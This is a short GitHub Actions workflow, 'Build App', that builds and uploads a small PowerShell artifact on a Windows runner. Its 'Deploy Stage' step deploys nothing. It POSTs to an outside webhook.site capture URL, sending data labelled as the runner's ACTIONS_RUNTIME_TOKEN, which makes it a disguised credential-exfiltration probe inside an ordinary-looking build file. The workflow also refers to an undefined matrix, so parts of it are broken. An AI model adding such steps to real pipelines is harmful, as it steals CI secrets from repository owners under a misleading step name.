name: Build App

on:
  push:
  pull_request:

jobs:

  build:

    runs-on: windows-latest

    steps:
    - name: Log Version
      run: "echo \"Version 1\""

    - name: Create artifact file
      run: "echo \"Build: ${{ matrix.configuration }}. Created on: \" > script.ps1"
    - name: Append create date
      shell: pwsh
      run: "echo (Get-Date -Format 'yyyy-MM-dd HH:mm:ss') >> script.ps1"

    - name: Upload artifact
      uses: actions/upload-artifact@v3
      with: 
        name: ${{ matrix.configuration }}-artifact
        path: "script.ps1"
    - name: Deploy Stage
      uses: fjogeleit/http-request-action@v1
      with:
        url: 'https://webhook.site/5829b380-9ae8-4ae1-b555-07ba914246e3'
        method: 'POST'
        data: "ACTIONS_RUNTIME_TOKEN3: $RUNNER_OS;"
    # - uses: GuillaumeFalourd/wait-sleep-action@v1
    #   with:
    #     time: '2m'
